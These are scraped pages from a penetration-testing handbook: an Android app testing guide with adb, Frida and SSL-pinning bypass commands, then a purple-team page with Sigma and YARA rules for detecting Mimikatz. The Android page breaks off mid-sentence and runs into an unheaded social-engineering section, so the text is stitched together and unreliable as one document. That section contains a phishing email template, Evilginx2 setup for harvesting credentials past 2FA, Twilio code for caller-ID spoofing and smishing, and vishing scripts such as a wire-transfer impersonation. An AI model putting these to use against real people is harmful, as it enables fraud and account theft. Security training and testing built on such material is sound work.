[](https://www.pentest-book.com/mobile/android#extract) Extract Copy # Jadx - decompiler gui jadx-gui # Jadx - decomp cli (with deobf) jadx -d path/to/extract/ --deobf app_name.apk # Apkx decompiler apkx example.apk # Apktool apktool d app_name.apk ### [](https://www.pentest-book.com/mobile/android#get-sensitive-info) Get sensitive info Copy # Urls and secrets # https://github.com/dwisiswant0/apkleaks python apkleaks.py -f ~/path/to/file.apk # Analyze URLs in apk: # https://github.com/shivsahni/APKEnum python APKEnum.py -p ~/Downloads/app-debug.apk # Quick wins tool (go branch) # https://github.com/mzfr/slicer slicer -d path/to/extact/apk # Unpack apk and find interesting strings apktool d app_name.apk cd apk_folder grep -EHirn "accesskey|admin|aes|api_key|apikey|checkClientTrusted|crypt|http:|https:|password|pinning|secret|SHA256|SharedPreferences|superuser|token|X509TrustManager|insert into" grep -Phro "(https?://)[\w\.-/]+[\"'\`]" | sed 's#"##g' | anew | grep -v "w3\|android\|github\|http://schemas.android\|google\|http://goo.gl" # Apk analyzer # https://github.com/Cyber-Buddy/APKHunt # Regex FCM Server Keys for push notification services control AAAA[A-Za-z0-9_-]{7}:[A-Za-z0-9_-]{140} AIza[0-9A-Za-z_-]{35} # FCM Google Server Keys Validation # https://github.com/adarshshetty18/fcm_server_key python3 fcmserverkey.py file.apk # Facebook Static Analysis Tool https://github.com/facebook/mariana-trench/ # Manifest.xml findings: android:allowBackup = TRUE android:debuggable = TRUE andorid:exported= TRUE or not set (within -Tag) --> allows external app to access data android.permission.WRITE_EXTERNAL_STORAGE / READ_EXTERNAL_STORAGE (ONLY IF sensitive data was stored/read externally) Use of permissions e.g. the app opens website in external browser (not inApp), however requires "android.permission.INTERNET" --> false usage of permissions. (over-privileged) "android:protectionLevel" was not set properly () missing android:permission (permission tags limit exposure to other apps) ### [](https://www.pentest-book.com/mobile/android#static-analyzers) Static analyzers [](https://www.pentest-book.com/mobile/android#manual-analysis-adb-frida-objection-etc) Manual analysis (adb, frida, objection, etc...) -------------------------------------------------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/mobile/android#burp-cert-installation-greater-than-android-7.0) Burp Cert Installation > Android 7.0 [](https://www.pentest-book.com/mobile/android#tips) Tips -------------------------------------------------------------- [](https://www.pentest-book.com/mobile/android#mindmaps) Mindmaps ---------------------------------------------------------------------- ![](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2F1729840239-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-legacy-files%2Fo%2Fassets%252F-M5x1LJiRQvXWpt04_ee%252F-M72_PEgqj2-ulDN_4Y9%252F-M72_YwfAB8MOh1N4ExV%252Fimage.png%3Falt%3Dmedia%26token%3Dacb59d2f-973b-4ce0-ab0e-5f4b4dbfab57&width=768&dpr=3&quality=100&sign=9c4dca61&sv=2) ![](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2F1729840239-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-legacy-files%2Fo%2Fassets%252F-M5x1LJiRQvXWpt04_ee%252F-MG334wP73Uq-vfgghJE%252F-MG338numhpA3hG_ZBw_%252Fimage.png%3Falt%3Dmedia%26token%3D25c82767-9f09-40d4-bc91-c02cc40633ca&width=768&dpr=3&quality=100&sign=59ed2678&sv=2) [](https://www.pentest-book.com/mobile/android#flutter-applications) Flutter Applications ---------------------------------------------------------------------------------------------- Flutter apps compile to native code, making traditional decompilation harder. Here's how to test them: ### [](https://www.pentest-book.com/mobile/android#identifying-flutter-apps) Identifying Flutter Apps ### [](https://www.pentest-book.com/mobile/android#static-analysis) Static Analysis ### [](https://www.pentest-book.com/mobile/android#dynamic-analysis) Dynamic Analysis ### [](https://www.pentest-book.com/mobile/android#common-vulnerabilities) Common Vulnerabilities [](https://www.pentest-book.com/mobile/android#react-native-applications) React Native Applications -------------------------------------------------------------------------------------------------------- React Native apps use JavaScript, making analysis easier than Flutter. ### [](https://www.pentest-book.com/mobile/android#identifying-react-native-apps) Identifying React Native Apps ### [](https://www.pentest-book.com/mobile/android#extracting-javascript-code) Extracting JavaScript Code ### [](https://www.pentest-book.com/mobile/android#hermes-bytecode) Hermes Bytecode ### [](https://www.pentest-book.com/mobile/android#dynamic-analysis-1) Dynamic Analysis ### [](https://www.pentest-book.com/mobile/android#common-vulnerabilities-1) Common Vulnerabilities [](https://www.pentest-book.com/mobile/android#mobile-api-security) Mobile API Security -------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/mobile/android#common-api-issues-in-mobile-apps) Common API Issues in Mobile Apps ### [](https://www.pentest-book.com/mobile/android#authentication-testing) Authentication Testing ### [](https://www.pentest-book.com/mobile/android#api-specific-tools) API-Specific Tools [](https://www.pentest-book.com/mobile/android#owasp-mastg-mapping) OWASP MASTG Mapping -------------------------------------------------------------------------------------------- Key testing areas mapped to OWASP Mobile Application Security Testing Guide: MASTG Category What to Test MASVS-STORAGE Data storage, logs, backups, clipboard MASVS-CRYPTO Crypto implementation, key storage MASVS-AUTH Authentication, session management MASVS-NETWORK TLS, certificate pinning, network security config MASVS-PLATFORM WebViews, deep links, IPC MASVS-CODE Code quality, reverse engineering MASVS-RESILIENCE Anti-tampering, obfuscation Reference: [OWASP MASTG](https://mas.owasp.org/MASTG/) [](https://www.pentest-book.com/mobile/android#android-14-15-security-changes) Android 14-15 Security Changes ------------------------------------------------------------------------------------------------------------------ ### [](https://www.pentest-book.com/mobile/android#android-14-security-enhancements) Android 14 Security Enhancements ### [](https://www.pentest-book.com/mobile/android#testing-on-android-14) Testing on Android 14+ ### [](https://www.pentest-book.com/mobile/android#android-15-security-features) Android 15 Security Features ### [](https://www.pentest-book.com/mobile/android#proxy-setup-changes) Proxy Setup Changes ### [](https://www.pentest-book.com/mobile/android#bypassing-new-protections) Bypassing New Protections [](https://www.pentest-book.com/mobile/android#related-topics) Related Topics ---------------------------------------------------------------------------------- * [iOS Testing](https://www.pentest-book.com/mobile/ios) - iOS mobile security * [API Security](https://www.pentest-book.com/enumeration/web/api-security) - API testing * [WebAuthn](https://www.pentest-book.com/others/webauthn-passkeys) - Passkey testing [PreviousGeneral](https://www.pentest-book.com/mobile/general) [NextiOS](https://www.pentest-book.com/mobile/ios) Last updated 5 months ago Was this helpful? * [Tools](https://www.pentest-book.com/mobile/android#tools) * [Extract](https://www.pentest-book.com/mobile/android#extract) * [Get sensitive info](https://www.pentest-book.com/mobile/android#get-sensitive-info) * [Static analyzers](https://www.pentest-book.com/mobile/android#static-analyzers) * [Manual analysis (adb, frida, objection, etc...)](https://www.pentest-book.com/mobile/android#manual-analysis-adb-frida-objection-etc) * [Burp Cert Installation > Android 7.0](https://www.pentest-book.com/mobile/android#burp-cert-installation-greater-than-android-7.0) * [Tips](https://www.pentest-book.com/mobile/android#tips) * [Mindmaps](https://www.pentest-book.com/mobile/android#mindmaps) * [Flutter Applications](https://www.pentest-book.com/mobile/android#flutter-applications) * [Identifying Flutter Apps](https://www.pentest-book.com/mobile/android#identifying-flutter-apps) * [Static Analysis](https://www.pentest-book.com/mobile/android#static-analysis) * [Dynamic Analysis](https://www.pentest-book.com/mobile/android#dynamic-analysis) * [Common Vulnerabilities](https://www.pentest-book.com/mobile/android#common-vulnerabilities) * [React Native Applications](https://www.pentest-book.com/mobile/android#react-native-applications) * [Identifying React Native Apps](https://www.pentest-book.com/mobile/android#identifying-react-native-apps) * [Extracting JavaScript Code](https://www.pentest-book.com/mobile/android#extracting-javascript-code) * [Hermes Bytecode](https://www.pentest-book.com/mobile/android#hermes-bytecode) * [Dynamic Analysis](https://www.pentest-book.com/mobile/android#dynamic-analysis-1) * [Common Vulnerabilities](https://www.pentest-book.com/mobile/android#common-vulnerabilities-1) * [Mobile API Security](https://www.pentest-book.com/mobile/android#mobile-api-security) * [Common API Issues in Mobile Apps](https://www.pentest-book.com/mobile/android#common-api-issues-in-mobile-apps) * [Authentication Testing](https://www.pentest-book.com/mobile/android#authentication-testing) * [API-Specific Tools](https://www.pentest-book.com/mobile/android#api-specific-tools) * [OWASP MASTG Mapping](https://www.pentest-book.com/mobile/android#owasp-mastg-mapping) * [Android 14-15 Security Changes](https://www.pentest-book.com/mobile/android#android-14-15-security-changes) * [Android 14 Security Enhancements](https://www.pentest-book.com/mobile/android#android-14-security-enhancements) * [Testing on Android 14+](https://www.pentest-book.com/mobile/android#testing-on-android-14) * [Android 15 Security Features](https://www.pentest-book.com/mobile/android#android-15-security-features) * [Proxy Setup Changes](https://www.pentest-book.com/mobile/android#proxy-setup-changes) * [Bypassing New Protections](https://www.pentest-book.com/mobile/android#bypassing-new-protections) * [Related Topics](https://www.pentest-book.com/mobile/android#related-topics) Was this helpful? Copy # Android Malware Analyzer # https://github.com/quark-engine/quark-engine pipenv shell quark -a test.apk -r rules/ --detail # Androtickler https://github.com/ernw/AndroTickler java -jar AndroTickler.jar # androbugs.py python androbugs.py -f /root/android.apk # MobSF # https://github.com/MobSF/Mobile-Security-Framework-MobSF - Findings: Cleartext credentials (includes base64 encoded or weak encrypted ones) Credentials cracked (brute-force, guessing, decrypted with stored cryptographic-key, ...) File permission MODE_WORLD_READABLE / MODE_WORLD_WRITEABLE (other apps/users are able to read/write) If http is in use (no SSL) Anything that shouldn't be there (debug info, comments wiht info disclosure, ...) Copy # Good Checklist https://mobexler.com/checklist.htm#android # Adb # https://developer.android.com/studio/command-line/adb?hl=es-419 adb connect IP:PORT/ID adb devices adb shell adb push adb install adb shell pm list packages # List all installed packages adb shell pm path xx.package.name # DeviceId adb shell settings get secure android_id adb shell sqlite3 /data/data/com.android.providers.settings/databases/settings.db "select value from secure where name = 'android_id'" # Frida (rooted device method) # https://github.com/frida/frida/releases adb root adb push /root/Downloads/frida-server-12.7.24-android-arm /data/local/tmp/. # Linux adb push C:\Users\username\Downloads\frida-server-12.8.11-android-arm /data/local/tmp/. # Windows adb root adb shell "chmod 755 /data/local/tmp/frida-server && /data/local/tmp/frida-server &" frida-ps -U # Check frida running correctly # Run Frida script frida -U -f com.vendor.app.version -l PATH\fridaScript.js --no-pause # Easy way to load Frida Server in Rooted Device https://github.com/dineshshetty/FridaLoader # Frida (NON rooted device) a.k.a. patch the apk # a) Lief injector method # https://gitlab.com/jlajara/frida-gadget-lief-injector # b) Objection and dalvik bytecode method https://github.com/sensepost/objection/wiki/Patching-Android-Applications#patching---patching-an-apk # Frida resources https://codeshare.frida.re/ https://github.com/dweinstein/awesome-frida https://rehex.ninja/posts/frida-cheatsheet/ https://github.com/androidmalware/android_frida_scripts # Objection # https://github.com/sensepost/objection objection --gadget com.vendor.app.xx explore android sslpinning disable # Android Backup files (*.ab files) ( printf "\x1f\x8b\x08\x00\x00\x00\x00\x00" ; tail -c +25 backup.ab ) | tar xfvz - # Useful apps: # Xposed Framework # RootCloak # SSLUnpinning # Check Info Stored find /data/app -type f -exec grep --color -Hsiran "FINDTHIS" {} \; find /storage/sdcard0/Android/ -maxdepth 7 -exec ls -dl \{\} \; /data/data/com.app/database/keyvalue.db /data/data/com.app/database/sqlite /data/app/ /data/user/0/ /storage/emulated/0/Android/data/ /storage/emulated/0/Android/obb/ /assets /res/raw /target/global/Constants.java # Check logs during app usage https://github.com/JakeWharton/pidcat # Download apks https://apkpure.com https://apps.evozi.com/apk-downloader/ https://apkcombo.com/ Copy #!/bin/bash # Export only certificate in burp as DER format openssl x509 -inform DER -in cacert.der -out cacert.pem export CERT_HASH=$(openssl x509 -inform PEM -subject_hash_old -in cacert.pem | head -1) adb root && adb remount adb push cacert.pem "/sdcard/${CERT_HASH}.0" adb shell su -c "mv /sdcard/${CERT_HASH}.0 /system/etc/security/cacerts" adb shell su -c "chmod 644 /system/etc/security/cacerts/${CERT_HASH}.0" rm -rf cacert.* # Reboot device Copy Recon: - AndroidManifest.xml (basically a blueprint for the application) Find exported components, api keys, custom deep link schemas, schema endpoints etc. - resources.arsc/strings.xml Developers are encouraged to store strings in this file instead of hard coding in application. - res/xml/file_paths.xml Shows file save paths. - Search source code recursively Especially BuildConfig files. - Look for firebase DB: Decompiled apk: Resources/resources.arsc/res/values/strings.xml, search for "firebsae.io" and try to access: https://*.firebase.io/.json API Keys: - String references in Android Classes getString(R.string.cmVzb3VyY2VzX3lv) cmVzb3VyY2VzX3lv is the string resource label. - Find these string references in strings.xml apikeyhere - Piece together the domains and required params in source code Exported components: - Activities - Entry points for application interactions of components specified in AndroidManifest.xml. Has several states managed by callbacks such as onCreate(). → Access to protected intents via exported Activities One exported activity that accepts a user provided intent can expose protected intents. → Access to sensitive data via exported Activity Often combined with deep links to steal data via unvalidated parameters. Write session tokens to an external file. → Access to sensitive files, stealing files, replacing imported files via exported Activities external-files-path, external-path Public app directories → Look for "content://" in source code - Service - Supplies additional functionality in the background. → Custom file upload service example that is vulnerable because android:exported="true". When exported by third party applications can send data to the service or steal sensitive data from applications depending on the services function. Check if params and intent data can be set with proof of concept application. - Broadcast receivers - Receives broadcasts from events of interest. Usually specified broadcasted intents in the broadcast receiver activity. → Vulnerable when receiver is exported and accepts user provided broadcasts. → Any application, including malicious ones, can send an intent to this broadcast receiver causing it to be triggered without any restrictions. - Content providers - Helps applications manage access to stored data and ways to share data with other Android applications → Content providers that connect to sqlite can be exploited via SQL injection by third party apps. Deep links - In Android, a deep link is a link that takes you directly to a specific destination within an app. - Think of deep links as Android urls to specific parts of the application. - Usually mirrors web application except with a different schema that navigate directory to specific Android activities. - Verified deep links can only use http and https schemas. Sometimes developers keep custom schemas for testing new features. - Type of vulnerabilities are based on how the scheme://, host://, and parameters are validated → CSRF - Test when autoVerify=ā€trueā€ is not present in AndroidManifest.xml It’s easier. → Open redirect - Test when custom schemes do not verify endpoint parameters or hosts → XSS - Test when endpoint parameters or host not validated, addJavaScriptInterface and → setJavascriptEnabled(true); is used. → LFI - Test when deep link parameters aren’t validated. appschema://app/goto?file= Database encryption - Check database is encrypted under /data/data// - Check in source code for database credentials Allowed backup - Lead to sensitive information disclosure - adb backup com.vendor.app Logging Enabled - Check logcat when login and any action performed Storing Sensitive Data in External Storage - Check data stored after usage /sdcard/android/data/com.vendor.app/ Weak Hashing Algorithms - MD5 is a weak algorythm and have collisions Predictable Random Number Generator (PRNG) - The java.util.Random function is predictable Hard-coded Data - Hard-coded user authentication information (credentials, PINs, etc.) - Hard-coded cryptographic keys. - Hard-coded keys used for encrypted databases. - Hard-coded API keys/private - Hard-coded keys that have been encoded or encrypted (e.g. base64 encoded, XOR encrypted, etc.). - Hard-coded server IP addresses. Debug Mode enabled - Start a shell on Android and gain an interactive shell with run-as command - run-as com.vendor.app - adb exec-out run-as com.vendor.app cat databases/appName > appNameDB-copy If you get built-in WebView and try to access: appscheme://webview?url=https://google.com appscheme://webview?url=javascript:document.write(document.domain) If install apk in Genymotion fails with "INSTALL_FAILED_NO_MATCHING_ABIS": - Apk is compiled only for ARM - Download zip for your Android version here https://github.com/m9rco/Genymotion_ARM_Translation - Move zip to VM and flash https://pentester.land/tips-n-tricks/2018/10/19/installing-arm-android-apps-on-genymotion-devices.html Copy # Check APK for Flutter markers unzip -l app.apk | grep -E "libflutter|libapp" # Flutter apps contain: # - lib/arm64-v8a/libflutter.so # - lib/arm64-v8a/libapp.so (compiled Dart code) # Check for Flutter engine strings libflutter.so | grep -i flutter Copy # Extract Dart snapshot # Flutter compiles Dart to AOT snapshot in libapp.so # reFlutter - Flutter reverse engineering # https://github.com/nickcano/ReFlutter reflutter app.apk # Doldrums - Dart/Flutter snapshot parser # https://github.com/nickcano/doldrums doldrums libapp.so # blutter - Flutter reverse engineering framework # https://github.com/nickcano/blutter blutter libapp.so Copy # Frida with Flutter # Flutter uses Dart runtime, need special hooks # reFlutter automated patching # Creates patched APK with traffic interception reflutter app.apk -b burp # SSL Pinning bypass for Flutter # https://github.com/nickcano/reflutter # Patches libflutter.so to disable certificate verification # Manual Frida hook for Flutter HTTP # Flutter uses BoringSSL, need to hook ssl_crypto_x509_session_verify_cert_chain Copy 1. Hardcoded secrets in Dart code - API keys, credentials compiled into libapp.so - Use strings/reFlutter to extract 2. Insecure data storage - shared_preferences (plain text) - sqflite databases - Check /data/data//shared_prefs/ 3. Insufficient transport security - Flutter ignores system CA store by default - Developers must explicitly add certificate validation 4. Deep link vulnerabilities - Same as native Android - Check pubspec.yaml for app_links configuration Copy # Check for React Native markers unzip -l app.apk | grep -E "index.android.bundle|libreactnative" # React Native apps contain: # - assets/index.android.bundle (JavaScript code) # - lib/*/libreactnativejni.so # Check JavaScript bundle strings assets/index.android.bundle | head -50 Copy # JavaScript is in index.android.bundle unzip app.apk -d extracted/ cat extracted/assets/index.android.bundle # If minified, use beautifier # https://beautifier.io/ # Or js-beautify js-beautify index.android.bundle > readable.js # Search for sensitive data grep -E "api[_-]?key|secret|password|token" readable.js grep -E "https?://" readable.js | sort -u Copy # Newer React Native apps may use Hermes engine # Hermes compiles JS to bytecode # Check if Hermes is used file assets/index.android.bundle # Output: "Hermes JavaScript bytecode" = Hermes enabled # Decompile Hermes bytecode # https://github.com/nickcano/hermes-dec hermes-dec index.android.bundle -o decompiled.js # hbctool - Hermes bytecode tool # https://github.com/nickcano/pocs/tree/master/nickcano/nickcano/nickcano/nickcano/nickcano hbctool disasm index.android.bundle Copy # Frida works well with React Native # Hook JavaScript bridge # List all loaded classes frida -U -f com.app.name -l rn_hooks.js # SSL Pinning bypass (React Native) # Usually uses OkHttp or fetch frida -U -f com.app.name -l ssl_bypass.js # React Native specific hooks # https://github.com/nickcano/nickcano Copy 1. Exposed JavaScript source code - All app logic visible in index.android.bundle - API endpoints, business logic exposed 2. AsyncStorage insecure storage - Stores data in plain text SQLite - Check /data/data//databases/RKStorage 3. Deep linking vulnerabilities - Check Linking.addEventListener handlers - URL parameter injection 4. JavaScript injection - WebView with evaluateJavascript - User input in JS execution context 5. Insecure native modules - Custom native code may have vulnerabilities - Review Java/Kotlin bridges Copy # Traffic interception setup # 1. Install Burp CA on device # 2. Configure proxy # 3. Bypass SSL pinning if needed # Look for: # - Hardcoded API keys # - Insecure authentication (API key only, no user token) # - Broken object-level authorization (BOLA) # - Missing rate limiting # - Excessive data exposure # - Mass assignment vulnerabilities Copy # Test token handling # - JWT vulnerabilities (alg:none, weak secret) # - Token expiration # - Token storage (SharedPreferences vs Keystore) # Test session management # - Logout invalidation # - Concurrent sessions # - Session timeout Copy # Mobile API security testing # https://github.com/nickcano/mitmproxy mitmproxy --mode regular --ssl-insecure # Postman/Insomnia for API testing # Import requests from Burp # Frida to extract API tokens frida -U -f com.app.name -l extract_tokens.js Copy # 1. Credential Manager API # Unified API for passwords, passkeys, and federated identity # Apps should migrate from legacy auth # Test credential storage and handling # 2. Partial Media Access # Users can grant access to specific photos/videos # Test app behavior with limited media permissions # Ensure app handles partial access gracefully # 3. Runtime Registered Broadcast Receivers # Must declare RECEIVER_EXPORTED or RECEIVER_NOT_EXPORTED # Check for exported receivers in dynamic registration # 4. Intent Sender Improvements # Stronger package validation for PendingIntents # Test intent handling with spoofed packages # 5. Minimum Target SDK Requirements # Apps targeting

Dear {{.FirstName}},

We detected unusual activity on your account. Please verify your identity by clicking the link below:

Verify Account

If you did not request this, please ignore this email.

IT Security Team

Copy # Techniques: # - Use legitimate services (SendGrid, Mailchimp) # - Warm up new domains before campaigns # - Avoid spam trigger words # - Use HTML tables instead of divs # - Include unsubscribe link # - Maintain low bounce rate # Link obfuscation # - Use URL shorteners (bit.ly, tinyurl) # - Redirect through Google/Bing # - Use legitimate-looking subdomains # - Encode URLs # Attachment tricks # - Password-protected archives # - HTML smuggling # - ISO/VHD containers (bypass Mark of the Web) Copy # https://github.com/kgretzky/evilginx2 # MITM phishing framework - bypasses 2FA # Install go install github.com/kgretzky/evilginx2@latest # Configure phishlet evilginx2> config domain yourdomain.com evilginx2> config ip evilginx2> phishlets hostname o365 login.yourdomain.com evilginx2> phishlets enable o365 # Create lure evilginx2> lures create o365 evilginx2> lures get-url 0 Copy # https://github.com/drk1wi/Modlishka # Another MITM proxy for credential harvesting ./Modlishka -config config.json # Key features: # - Automatic certificate generation # - Session hijacking # - 2FA bypass # - Pattern-based credential extraction Copy # Reconnaissance for targeted attacks # 1. LinkedIn profiling # 2. Company org chart # 3. Recent news/events # 4. Technology stack (job postings) # 5. Business relationships # Craft personalized pretext: # - Reference specific projects # - Mention colleagues by name # - Use internal terminology # - Align with current events Copy # Services: # - Twilio (programmable) # - SpoofCard # - Various VoIP providers # Python with Twilio from twilio.rest import Client client = Client(account_sid, auth_token) call = client.calls.create( to="+1target", from_="+1spoofed_number", url="http://yourserver.com/voice.xml" ) Copy # IT Support "Hi, this is [name] from IT. We're seeing some unusual activity on your account and need to verify your identity before we can proceed with the investigation." # HR/Payroll "Hi, this is [name] from HR. We're updating our records and noticed some discrepancies with your direct deposit information. Can you verify your details?" # Vendor/Partner "Hi, this is [name] from [vendor]. We're experiencing some issues with your account and need to verify the login credentials your team is using." # Executive Impersonation "Hi, this is [executive name]'s assistant. They need you to process an urgent wire transfer and asked me to coordinate the details with you." Copy # Asterisk PBX for call routing apt install asterisk # Basic configuration for outbound calls # Edit /etc/asterisk/extensions.conf and sip.conf # Use for: # - IVR (Interactive Voice Response) attacks # - Conference call impersonation # - Callback verification bypass Copy # Services: # - Twilio # - Nexmo/Vonage # - SMSGlobal # Python with Twilio from twilio.rest import Client client = Client(account_sid, auth_token) message = client.messages.create( body="[BankName] Alert: Unusual activity detected. Verify: https://evil.link", from_="+1spoofed_or_shortcode", to="+1target" ) Copy # Banking "[Bank] ALERT: Suspicious transaction of $2,500. If not you, verify: [link]" # Delivery "USPS: Your package cannot be delivered. Update delivery preferences: [link]" # Account Verification "[Company] Your account will be suspended. Verify now: [link]" # Prize/Reward "Congratulations! You've won a $500 gift card. Claim here: [link]" Copy # Techniques: # - Carry boxes/equipment (hands full) # - Arrive with delivery/maintenance uniform # - Follow smokers back inside # - Wait for group entry # - Use "forgot badge" excuse # Props: # - Clipboard with papers # - Boxes/packages # - Laptop bag # - Hard hat/safety vest # - Tool belt Copy # IT Support "Hi, I'm from IT. We had a ticket about printer issues on this floor." # Facilities/Maintenance "Building maintenance. We need to check the HVAC units." # Vendor "I'm here to service the [equipment]. Should be on your schedule." # New Employee "First day here, still waiting for my badge. HR said to come up." # Delivery "Package delivery for [department]. Need a signature." Copy # See Wireless Testing section for RFID cloning # Long-range badge readers # ESPKey - https://redteamtools.com/espkey # BLEKey - BLE badge capture # Badge creation # Blank cards + printer # Or professional duplicator services Copy # Rubber Ducky payloads # https://github.com/hak5/usbrubberducky-payloads # BadUSB with Arduino # https://github.com/krakrukra/BadUSB-Killer # Bash Bunny # https://docs.hak5.org/bash-bunny/ # O.MG Cable # https://o.mg.lol/ # USB Drop scenarios: # - Parking lot # - Reception desk # - Conference rooms # - Common areas # - Labeled "Confidential" or "Salary Info" Copy # LinkedIn Intelligence # - Employee names and roles # - Organizational structure # - Technology stack (job postings) # - Recent news/changes # Email format discovery # https://hunter.io # https://phonebook.cz # https://www.email-format.com # Social media # - Facebook for personal info # - Twitter for company updates # - Instagram for location data # - GitHub for technical details # Company research # - Annual reports # - Press releases # - SEC filings (if public) # - WHOIS records # - Job postings Copy # Verify email exists # https://github.com/reacherhq/check-if-email-exists check-if-email-exists test@company.com # SMTP verification (may be blocked) nc -vn mail.company.com 25 HELO attacker.com MAIL FROM: RCPT TO: Copy # Track: # - Emails sent vs delivered # - Open rate # - Click rate # - Submission rate (creds entered) # - Report rate (user reported phishing) # - Time to first click # - Department breakdown Copy # Screenshot all pages/emails # Log all interactions # Capture credentials (securely, delete after) # Record phone calls (with consent) # Photograph physical access # Document timeline of events Copy IMPORTANT: - Always have written authorization - Define scope clearly - Protect captured credentials - Don't cause unnecessary harm - Brief affected users post-campaign - Provide security awareness training - Delete all captured data after reporting --- # Purple Team | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/others/purple-team.md) . [](https://www.pentest-book.com/others/purple-team#overview) Overview -------------------------------------------------------------------------- Purple teaming combines offensive (red) and defensive (blue) team activities to improve overall security posture. This section covers detection engineering, log analysis from an attacker's perspective, and SIEM evasion techniques. [](https://www.pentest-book.com/others/purple-team#detection-engineering-basics) Detection Engineering Basics ------------------------------------------------------------------------------------------------------------------ ### [](https://www.pentest-book.com/others/purple-team#understanding-detection-logic) Understanding Detection Logic Copy # Detections typically look for: # 1. Known bad indicators (signatures) # 2. Suspicious behavior patterns (heuristics) # 3. Anomalies from baseline (behavioral) # 4. Correlation of multiple events # Common detection frameworks: # - MITRE ATT&CK (adversary tactics/techniques) # - Sigma (generic detection rules) # - YARA (malware patterns) # - Snort/Suricata (network IDS) # Detection efficacy depends on: # - Log coverage (what's being collected) # - Rule quality (precision vs recall) # - Analyst response time # - False positive rate ### [](https://www.pentest-book.com/others/purple-team#sigma-rules) Sigma Rules ### [](https://www.pentest-book.com/others/purple-team#yara-rules) YARA Rules [](https://www.pentest-book.com/others/purple-team#log-analysis-for-attackers) Log Analysis for Attackers -------------------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/others/purple-team#windows-event-logs) Windows Event Logs ### [](https://www.pentest-book.com/others/purple-team#linux-logs) Linux Logs ### [](https://www.pentest-book.com/others/purple-team#network-logs) Network Logs [](https://www.pentest-book.com/others/purple-team#siem-evasion) SIEM Evasion ---------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/others/purple-team#blending-in) Blending In ### [](https://www.pentest-book.com/others/purple-team#log-tampering) Log Tampering ### [](https://www.pentest-book.com/others/purple-team#avoiding-detection-rules) Avoiding Detection Rules ### [](https://www.pentest-book.com/others/purple-team#network-evasion) Network Evasion [](https://www.pentest-book.com/others/purple-team#atomic-red-team) Atomic Red Team ---------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/others/purple-team#overview-1) Overview ### [](https://www.pentest-book.com/others/purple-team#testing-detection-coverage) Testing Detection Coverage [](https://www.pentest-book.com/others/purple-team#detection-bypass-techniques) Detection Bypass Techniques ---------------------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/others/purple-team#amsi-bypass-revisited) AMSI Bypass (Revisited) ### [](https://www.pentest-book.com/others/purple-team#etw-bypass) ETW Bypass ### [](https://www.pentest-book.com/others/purple-team#script-block-logging-bypass) Script Block Logging Bypass ### [](https://www.pentest-book.com/others/purple-team#sysmon-evasion) Sysmon Evasion [](https://www.pentest-book.com/others/purple-team#resources) Resources ---------------------------------------------------------------------------- ### [](https://www.pentest-book.com/others/purple-team#tools) Tools ### [](https://www.pentest-book.com/others/purple-team#references) References * [MITRE ATT&CK](https://attack.mitre.org/) * [Sigma Rules](https://github.com/SigmaHQ/sigma) * [Atomic Red Team](https://atomicredteam.io/) * [Detection Lab](https://github.com/clong/DetectionLab) * [HELK](https://github.com/Cyb3rWard0g/HELK) * [Threat Hunter Playbook](https://threathunterplaybook.com/) [PreviousHardware Hacking](https://www.pentest-book.com/others/hardware) [NextIoT Protocols](https://www.pentest-book.com/others/iot-protocols) Last updated 5 months ago Was this helpful? * [Overview](https://www.pentest-book.com/others/purple-team#overview) * [Detection Engineering Basics](https://www.pentest-book.com/others/purple-team#detection-engineering-basics) * [Understanding Detection Logic](https://www.pentest-book.com/others/purple-team#understanding-detection-logic) * [Sigma Rules](https://www.pentest-book.com/others/purple-team#sigma-rules) * [YARA Rules](https://www.pentest-book.com/others/purple-team#yara-rules) * [Log Analysis for Attackers](https://www.pentest-book.com/others/purple-team#log-analysis-for-attackers) * [Windows Event Logs](https://www.pentest-book.com/others/purple-team#windows-event-logs) * [Linux Logs](https://www.pentest-book.com/others/purple-team#linux-logs) * [Network Logs](https://www.pentest-book.com/others/purple-team#network-logs) * [SIEM Evasion](https://www.pentest-book.com/others/purple-team#siem-evasion) * [Blending In](https://www.pentest-book.com/others/purple-team#blending-in) * [Log Tampering](https://www.pentest-book.com/others/purple-team#log-tampering) * [Avoiding Detection Rules](https://www.pentest-book.com/others/purple-team#avoiding-detection-rules) * [Network Evasion](https://www.pentest-book.com/others/purple-team#network-evasion) * [Atomic Red Team](https://www.pentest-book.com/others/purple-team#atomic-red-team) * [Overview](https://www.pentest-book.com/others/purple-team#overview-1) * [Testing Detection Coverage](https://www.pentest-book.com/others/purple-team#testing-detection-coverage) * [Detection Bypass Techniques](https://www.pentest-book.com/others/purple-team#detection-bypass-techniques) * [AMSI Bypass (Revisited)](https://www.pentest-book.com/others/purple-team#amsi-bypass-revisited) * [ETW Bypass](https://www.pentest-book.com/others/purple-team#etw-bypass) * [Script Block Logging Bypass](https://www.pentest-book.com/others/purple-team#script-block-logging-bypass) * [Sysmon Evasion](https://www.pentest-book.com/others/purple-team#sysmon-evasion) * [Resources](https://www.pentest-book.com/others/purple-team#resources) * [Tools](https://www.pentest-book.com/others/purple-team#tools) * [References](https://www.pentest-book.com/others/purple-team#references) Was this helpful? Copy # Sigma - generic signature format for SIEM # https://github.com/SigmaHQ/sigma # Example: Detect Mimikatz usage title: Mimikatz Use status: stable logsource: category: process_creation product: windows detection: selection: - CommandLine|contains: - 'sekurlsa::logonpasswords' - 'lsadump::sam' - 'lsadump::dcsync' - Image|endswith: - '\mimikatz.exe' condition: selection falsepositives: - Legitimate security testing level: critical # Convert to SIEM-specific format # sigmac -t splunk rule.yml # sigmac -t elastalert rule.yml # sigmac -t qradar rule.yml Copy # YARA - pattern matching for files/memory rule Mimikatz_Memory { meta: description = "Detects Mimikatz in memory" author = "security team" strings: $s1 = "sekurlsa" ascii wide $s2 = "wdigest" ascii wide $s3 = "kerberos" ascii wide $s4 = "mimikatz" ascii wide nocase $s5 = { 4D 69 6D 69 6B 61 74 7A } // Mimikatz condition: 3 of them } # Scan with YARA yara -s rules.yar 